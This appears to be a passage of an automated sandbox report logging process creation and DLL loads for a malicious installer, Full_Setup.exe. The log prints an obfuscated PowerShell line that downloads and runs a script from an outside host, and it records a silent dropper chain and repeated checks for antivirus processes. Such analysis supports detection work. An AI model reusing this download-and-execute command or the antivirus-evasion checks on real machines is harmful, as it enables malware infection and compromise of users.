Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH \| find /I "sophoshealth.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
Source: C:\Users\user\Desktop\Full_Setup.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; z	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Process created: C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe "C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe	Process created: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp "C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp" /SL5="$2042E,7785838,845824,C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Process created: C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe "C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe	Process created: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp "C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp" /SL5="$90296,7785838,845824,C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process created: C:\Windows\System32\timeout.exe "timeout" 9	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH \| find /I "wrsa.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH \| find /I "opssvc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH \| find /I "avastui.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH \| find /I "avgui.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH \| find /I "nswscsvc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH \| find /I "sophoshealth.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"

Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll	Jump to behavior
